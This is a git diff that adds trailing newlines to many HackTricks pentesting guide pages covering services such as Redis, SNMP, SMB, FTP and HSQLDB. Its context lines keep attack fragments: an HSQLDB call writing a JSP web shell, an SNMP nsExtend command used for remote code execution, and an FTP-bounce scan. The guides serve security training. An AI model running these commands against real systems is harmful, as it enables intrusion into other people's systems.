--- a/src/network-services-pentesting/554-8554-pentesting-rtsp.md
+++ b/src/network-services-pentesting/554-8554-pentesting-rtsp.md
@@ -82,3 +82,4 @@ To bruteforce: [https://github.com/Tek-Security-Group/rtsp_authgrinder](https://
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/5555-android-debug-bridge.md b/src/network-services-pentesting/5555-android-debug-bridge.md
index ff7325af2..d9ec8d475 100644
--- a/src/network-services-pentesting/5555-android-debug-bridge.md
+++ b/src/network-services-pentesting/5555-android-debug-bridge.md
@@ -51,3 +51,4 @@ You can use this trick to **retrieve sensitive information like chrome passwords
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/5601-pentesting-kibana.md b/src/network-services-pentesting/5601-pentesting-kibana.md
index 143a28bc4..eadd11568 100644
--- a/src/network-services-pentesting/5601-pentesting-kibana.md
+++ b/src/network-services-pentesting/5601-pentesting-kibana.md
@@ -27,3 +27,4 @@ In instances where SSL/TLS is not enabled, the potential for leaking sensitive i
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/5671-5672-pentesting-amqp.md b/src/network-services-pentesting/5671-5672-pentesting-amqp.md
index a9f1d5978..5dd35377b 100644
--- a/src/network-services-pentesting/5671-5672-pentesting-amqp.md
+++ b/src/network-services-pentesting/5671-5672-pentesting-amqp.md
@@ -79,3 +79,4 @@ In [https://www.rabbitmq.com/networking.html](https://www.rabbitmq.com/networkin
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/584-pentesting-afp.md b/src/network-services-pentesting/584-pentesting-afp.md
index 09b7d929b..fd0878407 100644
--- a/src/network-services-pentesting/584-pentesting-afp.md
+++ b/src/network-services-pentesting/584-pentesting-afp.md
@@ -34,3 +34,4 @@ nmap -sV --script "afp-* and not dos and not brute" -p
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/5984-pentesting-couchdb.md b/src/network-services-pentesting/5984-pentesting-couchdb.md
index 0085ead85..7f6a10859 100644
--- a/src/network-services-pentesting/5984-pentesting-couchdb.md
+++ b/src/network-services-pentesting/5984-pentesting-couchdb.md
@@ -266,3 +266,4 @@ A [**summary**](https://github.com/carlospolop/hacktricks/pull/116/commits/e505c
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/5985-5986-pentesting-omi.md b/src/network-services-pentesting/5985-5986-pentesting-omi.md
index 34614b6f1..48a1fb55c 100644
--- a/src/network-services-pentesting/5985-5986-pentesting-omi.md
+++ b/src/network-services-pentesting/5985-5986-pentesting-omi.md
@@ -45,3 +45,4 @@ For a more information about this CVE **[check this](https://github.com/horizon3
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/5985-5986-pentesting-winrm.md b/src/network-services-pentesting/5985-5986-pentesting-winrm.md
index c5b01873f..0eaad0bbd 100644
--- a/src/network-services-pentesting/5985-5986-pentesting-winrm.md
+++ b/src/network-services-pentesting/5985-5986-pentesting-winrm.md
@@ -304,3 +304,4 @@ Entry_2:
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/6000-pentesting-x11.md b/src/network-services-pentesting/6000-pentesting-x11.md
index 7e0ca92da..d63329ed9 100644
--- a/src/network-services-pentesting/6000-pentesting-x11.md
+++ b/src/network-services-pentesting/6000-pentesting-x11.md
@@ -163,3 +163,4 @@ Then, put your IP address and port in the **R-Shell** option and click on **R-sh
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/623-udp-ipmi.md b/src/network-services-pentesting/623-udp-ipmi.md
index b2b9e7bca..602fdd83a 100644
--- a/src/network-services-pentesting/623-udp-ipmi.md
+++ b/src/network-services-pentesting/623-udp-ipmi.md
@@ -141,3 +141,4 @@ ID Name Callin Link Auth IPMI Msg Channel Priv Limit
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/6379-pentesting-redis.md b/src/network-services-pentesting/6379-pentesting-redis.md
index c1dff6378..08b2432c9 100644
--- a/src/network-services-pentesting/6379-pentesting-redis.md
+++ b/src/network-services-pentesting/6379-pentesting-redis.md
@@ -307,3 +307,4 @@ _For some reason (as for the author of_ [_https://liveoverflow.com/gitlab-11-4-7
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/69-udp-tftp.md b/src/network-services-pentesting/69-udp-tftp.md
index 2b97a8897..cc212a27a 100644
--- a/src/network-services-pentesting/69-udp-tftp.md
+++ b/src/network-services-pentesting/69-udp-tftp.md
@@ -45,3 +45,4 @@ client.upload("filename to upload", "/local/path/file", timeout=5)
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/7-tcp-udp-pentesting-echo.md b/src/network-services-pentesting/7-tcp-udp-pentesting-echo.md
index 16aac3cee..a652d2f86 100644
--- a/src/network-services-pentesting/7-tcp-udp-pentesting-echo.md
+++ b/src/network-services-pentesting/7-tcp-udp-pentesting-echo.md
@@ -35,3 +35,4 @@ Hello echo #This is the response
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/700-pentesting-epp.md b/src/network-services-pentesting/700-pentesting-epp.md
index 53507da2e..51e4496b7 100644
--- a/src/network-services-pentesting/700-pentesting-epp.md
+++ b/src/network-services-pentesting/700-pentesting-epp.md
@@ -15,3 +15,4 @@ Basically, it's one of the protocols a **TLD registrar is going to be offering t
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md b/src/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md
index 46603b87c..2d664cc99 100644
--- a/src/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md
+++ b/src/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md
@@ -99,3 +99,4 @@ It's also possible to use an **Apache AJP proxy** to access that port instead of
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/8086-pentesting-influxdb.md b/src/network-services-pentesting/8086-pentesting-influxdb.md
index b8c94d034..3e5d3b818 100644
--- a/src/network-services-pentesting/8086-pentesting-influxdb.md
+++ b/src/network-services-pentesting/8086-pentesting-influxdb.md
@@ -119,4 +119,4 @@ time cpu host usage_guest usage_guest_nice usage_idle msf6 > use auxiliary/scanner/http/influxdb_enum
 ```
-{{#include ../banners/hacktricks-training.md}}
\ No newline at end of file
+{{#include ../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/8089-splunkd.md b/src/network-services-pentesting/8089-splunkd.md
index 844bcfbc8..b7ed90d7f 100644
--- a/src/network-services-pentesting/8089-splunkd.md
+++ b/src/network-services-pentesting/8089-splunkd.md
@@ -124,3 +124,4 @@ In the following page you can find an explanation how this service can be abused
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/8333-18333-38333-18444-pentesting-bitcoin.md b/src/network-services-pentesting/8333-18333-38333-18444-pentesting-bitcoin.md
index 35bc5f7a4..d64c8abc4 100644
--- a/src/network-services-pentesting/8333-18333-38333-18444-pentesting-bitcoin.md
+++ b/src/network-services-pentesting/8333-18333-38333-18444-pentesting-bitcoin.md
@@ -51,3 +51,4 @@ PORT STATE SERVICE
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/873-pentesting-rsync.md b/src/network-services-pentesting/873-pentesting-rsync.md
index 86a6f22d4..5774606d2 100644
--- a/src/network-services-pentesting/873-pentesting-rsync.md
+++ b/src/network-services-pentesting/873-pentesting-rsync.md
@@ -101,3 +101,4 @@ Within this file, a _secrets file_ parameter might point to a file containing **
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/9000-pentesting-fastcgi.md b/src/network-services-pentesting/9000-pentesting-fastcgi.md
index d8b7d9e94..64ddebc5f 100644
--- a/src/network-services-pentesting/9000-pentesting-fastcgi.md
+++ b/src/network-services-pentesting/9000-pentesting-fastcgi.md
@@ -39,3 +39,4 @@ or you can also use the following python script: [https://gist.github.com/phith0
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/9001-pentesting-hsqldb.md b/src/network-services-pentesting/9001-pentesting-hsqldb.md
index 68875cc0f..d80671618 100644
--- a/src/network-services-pentesting/9001-pentesting-hsqldb.md
+++ b/src/network-services-pentesting/9001-pentesting-hsqldb.md
@@ -81,3 +81,4 @@ call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/9100-pjl.md b/src/network-services-pentesting/9100-pjl.md
index f73962716..ddbb65ea2 100644
--- a/src/network-services-pentesting/9100-pjl.md
+++ b/src/network-services-pentesting/9100-pjl.md
@@ -63,3 +63,4 @@ This is the tool you want to use to abuse printers:
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/9200-pentesting-elasticsearch.md b/src/network-services-pentesting/9200-pentesting-elasticsearch.md
index cc5bf2779..fbaf650d7 100644
--- a/src/network-services-pentesting/9200-pentesting-elasticsearch.md
+++ b/src/network-services-pentesting/9200-pentesting-elasticsearch.md
@@ -186,3 +186,4 @@ msf > use auxiliary/scanner/elasticsearch/indices_enum
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/cassandra.md b/src/network-services-pentesting/cassandra.md
index bc4dae4d6..d7bb7e9b3 100644
--- a/src/network-services-pentesting/cassandra.md
+++ b/src/network-services-pentesting/cassandra.md
@@ -53,3 +53,4 @@ nmap -sV --script cassandra-info -p
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/ipsec-ike-vpn-pentesting.md b/src/network-services-pentesting/ipsec-ike-vpn-pentesting.md
index e8591fe89..1b31eb61f 100644
--- a/src/network-services-pentesting/ipsec-ike-vpn-pentesting.md
+++ b/src/network-services-pentesting/ipsec-ike-vpn-pentesting.md
@@ -271,3 +271,4 @@ Ensure that actual, secure values are used to replace the placeholders when conf
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/nfs-service-pentesting.md b/src/network-services-pentesting/nfs-service-pentesting.md
index 752f5db33..44c80d930 100644
--- a/src/network-services-pentesting/nfs-service-pentesting.md
+++ b/src/network-services-pentesting/nfs-service-pentesting.md
@@ -130,3 +130,4 @@ Entry_2:
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-264-check-point-firewall-1.md b/src/network-services-pentesting/pentesting-264-check-point-firewall-1.md
index 122562f42..bb4312b95 100644
--- a/src/network-services-pentesting/pentesting-264-check-point-firewall-1.md
+++ b/src/network-services-pentesting/pentesting-264-check-point-firewall-1.md
@@ -43,3 +43,4 @@ CN=Panama,O=MGMTT.srv.rxfrmi
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md b/src/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md
index 27461163e..fcd2c7907 100644
--- a/src/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md
+++ b/src/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md
@@ -25,3 +25,4 @@ If you want to learn more about [**hacking printers read this page**](http://hac
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md b/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md
index fdafb885a..4a36b9352 100644
--- a/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md
+++ b/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md
@@ -21,3 +21,4 @@ jboss-service.xml
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-dns.md b/src/network-services-pentesting/pentesting-dns.md
index 02a338716..3d3b06e2d 100644
--- a/src/network-services-pentesting/pentesting-dns.md
+++ b/src/network-services-pentesting/pentesting-dns.md
@@ -267,3 +267,4 @@ Entry_6:
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-finger.md b/src/network-services-pentesting/pentesting-finger.md
index ed18916cd..de2f5f351 100644
--- a/src/network-services-pentesting/pentesting-finger.md
+++ b/src/network-services-pentesting/pentesting-finger.md
@@ -71,3 +71,4 @@ finger @internal@external
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-ftp/README.md b/src/network-services-pentesting/pentesting-ftp/README.md
index dc2f07fb6..7e0f721ed 100644
--- a/src/network-services-pentesting/pentesting-ftp/README.md
+++ b/src/network-services-pentesting/pentesting-ftp/README.md
@@ -282,3 +282,4 @@ Entry_7:
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md b/src/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md
index 521ff48c8..adacaa817 100644
--- a/src/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md
+++ b/src/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md
@@ -38,3 +38,4 @@ nmap -v -p 21,22,445,80,443 -b ftp:ftp@10.2.1.5 192.168.0.1/24 #Scan the interna
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md b/src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md
index f7016dea0..3c7f7189d 100644
--- a/src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md
+++ b/src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md
@@ -28,3 +28,4 @@ For a more detailed information check the post: [http://www.ouah.org/ftpbounce.h
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-imap.md b/src/network-services-pentesting/pentesting-imap.md
index c074bf496..76287cbf1 100644
--- a/src/network-services-pentesting/pentesting-imap.md
+++ b/src/network-services-pentesting/pentesting-imap.md
@@ -195,3 +195,4 @@ Entry_4:
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-irc.md b/src/network-services-pentesting/pentesting-irc.md
index eb79be27c..5b7552926 100644
--- a/src/network-services-pentesting/pentesting-irc.md
+++ b/src/network-services-pentesting/pentesting-irc.md
@@ -84,3 +84,4 @@ nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,66
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md b/src/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md
index f84927aaf..dba1d4031 100644
--- a/src/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md
+++ b/src/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md
@@ -69,3 +69,4 @@ I found that the use of `--break-on 'java.lang.String.indexOf'` makes the exploi
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-kerberos-88/README.md b/src/network-services-pentesting/pentesting-kerberos-88/README.md
index fe313311b..9f396aa6b 100644
--- a/src/network-services-pentesting/pentesting-kerberos-88/README.md
+++ b/src/network-services-pentesting/pentesting-kerberos-88/README.md
@@ -68,3 +68,4 @@ Entry_4:
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md b/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md
index 0c50e2701..713d58137 100644
--- a/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md
+++ b/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md
@@ -23,3 +23,4 @@ Building on the principles of the **hercules.sh script**, the [**tickey**](https
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md b/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md
index da0710f80..e173d4d71 100644
--- a/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md
+++ b/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md
@@ -45,3 +45,4 @@ When using these commands, ensure to replace placeholders like ``
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-ldap.md b/src/network-services-pentesting/pentesting-ldap.md
index 081ee1297..001144b6a 100644
--- a/src/network-services-pentesting/pentesting-ldap.md
+++ b/src/network-services-pentesting/pentesting-ldap.md
@@ -427,3 +427,4 @@ Entry_6:
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-modbus.md b/src/network-services-pentesting/pentesting-modbus.md
index 340e58e63..5beadffb1 100644
--- a/src/network-services-pentesting/pentesting-modbus.md
+++ b/src/network-services-pentesting/pentesting-modbus.md
@@ -23,3 +23,4 @@ msf> use auxiliary/scanner/scada/modbus_findunitid
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
index c1e3cf106..2c5e863f6 100644
--- a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
+++ b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
@@ -691,3 +691,4 @@ Entry_3:
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.md b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.md
index d46f9254c..fff9ee227 100644
--- a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.md
+++ b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.md
@@ -25,3 +25,4 @@ Table taken from the [**docs**](https://learn.microsoft.com/en-us/sql/relational
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-mysql.md b/src/network-services-pentesting/pentesting-mysql.md
index d15aeb2da..cc8193ae3 100644
--- a/src/network-services-pentesting/pentesting-mysql.md
+++ b/src/network-services-pentesting/pentesting-mysql.md
@@ -648,3 +648,4 @@ Entry_4:
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-ntp.md b/src/network-services-pentesting/pentesting-ntp.md
index fbd9eddfb..02764d893 100644
--- a/src/network-services-pentesting/pentesting-ntp.md
+++ b/src/network-services-pentesting/pentesting-ntp.md
@@ -84,3 +84,4 @@ Entry_2:
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-pop.md b/src/network-services-pentesting/pentesting-pop.md
index c3f140f03..58d67f223 100644
--- a/src/network-services-pentesting/pentesting-pop.md
+++ b/src/network-services-pentesting/pentesting-pop.md
@@ -131,3 +131,4 @@ Entry_6:
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-postgresql.md b/src/network-services-pentesting/pentesting-postgresql.md
index dc7c6dbea..782d57565 100644
--- a/src/network-services-pentesting/pentesting-postgresql.md
+++ b/src/network-services-pentesting/pentesting-postgresql.md
@@ -807,3 +807,4 @@ The available password-based authentication methods in pg_hba.conf are **md5**,
+
diff --git a/src/network-services-pentesting/pentesting-rdp.md b/src/network-services-pentesting/pentesting-rdp.md
index 169cc42ae..afb6cdded 100644
--- a/src/network-services-pentesting/pentesting-rdp.md
+++ b/src/network-services-pentesting/pentesting-rdp.md
@@ -148,3 +148,4 @@ Entry_2:
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-remote-gdbserver.md b/src/network-services-pentesting/pentesting-remote-gdbserver.md
index 7552dde2a..65c5935d2 100644
--- a/src/network-services-pentesting/pentesting-remote-gdbserver.md
+++ b/src/network-services-pentesting/pentesting-remote-gdbserver.md
@@ -184,3 +184,4 @@ RemoteCmd()
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-rlogin.md b/src/network-services-pentesting/pentesting-rlogin.md
index 0cc181b9b..1a46d69b4 100644
--- a/src/network-services-pentesting/pentesting-rlogin.md
+++ b/src/network-services-pentesting/pentesting-rlogin.md
@@ -39,3 +39,4 @@ find / -name .rhosts
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-rpcbind.md b/src/network-services-pentesting/pentesting-rpcbind.md
index 94598fc79..cb02d5574 100644
--- a/src/network-services-pentesting/pentesting-rpcbind.md
+++ b/src/network-services-pentesting/pentesting-rpcbind.md
@@ -115,3 +115,4 @@ Entry_3:
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-rsh.md b/src/network-services-pentesting/pentesting-rsh.md
index c0bd4a43d..5d242f218 100644
--- a/src/network-services-pentesting/pentesting-rsh.md
+++ b/src/network-services-pentesting/pentesting-rsh.md
@@ -28,3 +28,4 @@ rsh domain\\user@
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-sap.md b/src/network-services-pentesting/pentesting-sap.md
index 3cd3c2075..84f4d943f 100644
--- a/src/network-services-pentesting/pentesting-sap.md
+++ b/src/network-services-pentesting/pentesting-sap.md
@@ -387,3 +387,4 @@ bizploit> start
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-smb.md b/src/network-services-pentesting/pentesting-smb.md
index b77b9a063..7656937ad 100644
--- a/src/network-services-pentesting/pentesting-smb.md
+++ b/src/network-services-pentesting/pentesting-smb.md
@@ -592,3 +592,4 @@ Entry_6:
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-smb/README.md b/src/network-services-pentesting/pentesting-smb/README.md
index 8de9f08b7..29382269a 100644
--- a/src/network-services-pentesting/pentesting-smb/README.md
+++ b/src/network-services-pentesting/pentesting-smb/README.md
@@ -592,3 +592,4 @@ Entry_6:
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md b/src/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md
index 40a4dac95..dc3fda01f 100644
--- a/src/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md
+++ b/src/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md
@@ -89,3 +89,4 @@ To **understand** better how the tools _**samrdump**_ **and** _**rpcdump**_ work
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-smtp/README.md b/src/network-services-pentesting/pentesting-smtp/README.md
index 106c1dd92..2ebf994af 100644
--- a/src/network-services-pentesting/pentesting-smtp/README.md
+++ b/src/network-services-pentesting/pentesting-smtp/README.md
@@ -607,3 +607,4 @@ Entry_8:
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-smtp/smtp-commands.md b/src/network-services-pentesting/pentesting-smtp/smtp-commands.md
index ad03655e0..d76dec8a0 100644
--- a/src/network-services-pentesting/pentesting-smtp/smtp-commands.md
+++ b/src/network-services-pentesting/pentesting-smtp/smtp-commands.md
@@ -48,3 +48,4 @@ It terminates the SMTP conversation.
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-smtp/smtp-smuggling.md b/src/network-services-pentesting/pentesting-smtp/smtp-smuggling.md
index d4a2f4740..01044b2a1 100644
--- a/src/network-services-pentesting/pentesting-smtp/smtp-smuggling.md
+++ b/src/network-services-pentesting/pentesting-smtp/smtp-smuggling.md
@@ -35,3 +35,4 @@ Also note that the SPF is bypassed because if you smuggle an email from `admin@o
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-snmp/README.md b/src/network-services-pentesting/pentesting-snmp/README.md
index 9799a9a8e..8cc41a64e 100644
--- a/src/network-services-pentesting/pentesting-snmp/README.md
+++ b/src/network-services-pentesting/pentesting-snmp/README.md
@@ -284,3 +284,4 @@ Entry_5:
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-snmp/cisco-snmp.md b/src/network-services-pentesting/pentesting-snmp/cisco-snmp.md
index 3bec8802a..510fbcec1 100644
--- a/src/network-services-pentesting/pentesting-snmp/cisco-snmp.md
+++ b/src/network-services-pentesting/pentesting-snmp/cisco-snmp.md
@@ -42,3 +42,4 @@ msf6 auxiliary(scanner/snmp/snmp_enum) > exploit
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-snmp/snmp-rce.md b/src/network-services-pentesting/pentesting-snmp/snmp-rce.md
index 2a61dbf29..2af97c5cc 100644
--- a/src/network-services-pentesting/pentesting-snmp/snmp-rce.md
+++ b/src/network-services-pentesting/pentesting-snmp/snmp-rce.md
@@ -56,3 +56,4 @@ snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.129.2.26 'nsExtendSta
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-ssh.md b/src/network-services-pentesting/pentesting-ssh.md
index 0eb044ab0..6430b522b 100644
--- a/src/network-services-pentesting/pentesting-ssh.md
+++ b/src/network-services-pentesting/pentesting-ssh.md
@@ -343,3 +343,4 @@ Entry_2:
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-telnet.md b/src/network-services-pentesting/pentesting-telnet.md
index 3116c3a41..82cf4831e 100644
--- a/src/network-services-pentesting/pentesting-telnet.md
+++ b/src/network-services-pentesting/pentesting-telnet.md
@@ -81,3 +81,4 @@ Entry_4:
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-vnc.md b/src/network-services-pentesting/pentesting-vnc.md
index bff609c42..8f67ed44c 100644
--- a/src/network-services-pentesting/pentesting-vnc.md
+++ b/src/network-services-pentesting/pentesting-vnc.md
@@ -54,3 +54,4 @@ I save the tool here also for ease of access:
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-voip/README.md b/src/network-services-pentesting/pentesting-voip/README.md
index 21ea75e1a..70ee0c8e3 100644
--- a/src/network-services-pentesting/pentesting-voip/README.md
+++ b/src/network-services-pentesting/pentesting-voip/README.md
@@ -698,3 +698,4 @@ The easiest way to install a software such as Asterisk is to download an **OS di
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md b/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md
index f03e19482..274880d22 100644
--- a/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md
+++ b/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md
@@ -97,3 +97,4 @@ These protocols play essential roles in **delivering and securing real-time mult
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/sip-session-initiation-protocol.md b/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/sip-session-initiation-protocol.md
index 86588eb60..d1710c657 100644
--- a/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/sip-session-initiation-protocol.md
+++ b/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/sip-session-initiation-protocol.md
@@ -243,3 +243,4 @@ After the registrar server verifies the provided credentials, **it sends a "200
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-web/403-and-401-bypasses.md b/src/network-services-pentesting/pentesting-web/403-and-401-bypasses.md
index ee82a2a15..03a5dc8db 100644
--- a/src/network-services-pentesting/pentesting-web/403-and-401-bypasses.md
+++ b/src/network-services-pentesting/pentesting-web/403-and-401-bypasses.md
@@ -120,3 +120,4 @@ guest guest
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-web/README.md b/src/network-services-pentesting/pentesting-web/README.md
index becd6be82..84938d74d 100644
--- a/src/network-services-pentesting/pentesting-web/README.md
+++ b/src/network-services-pentesting/pentesting-web/README.md
@@ -423,3 +423,4 @@ Entry_12:
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md b/src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md
index 003b6f6e2..9f62440af 100644
--- a/src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md
+++ b/src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md
@@ -5,3 +5,4 @@ Find vulnerabilities and missconfigurations with [https://github.com/0ang3el/aem
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-web/angular.md b/src/network-services-pentesting/pentesting-web/angular.md
index 945432bbe..f1b1a7c22 100644
--- a/src/network-services-pentesting/pentesting-web/angular.md
+++ b/src/network-services-pentesting/pentesting-web/angular.md
@@ -614,3 +614,4 @@ According to the W3C documentation, the `window.location` and `document.location
+
diff --git a/src/network-services-pentesting/pentesting-web/apache.md b/src/network-services-pentesting/pentesting-web/apache.md
index 760cbf8c0..197d80d01 100644
--- a/src/network-services-pentesting/pentesting-web/apache.md
+++ b/src/network-services-pentesting/pentesting-web/apache.md
@@ -278,3 +278,4 @@ Check [**Docker PHP LFI Summary**](https://www.leavesongs.com/PENETRATION/docker
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md b/src/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md
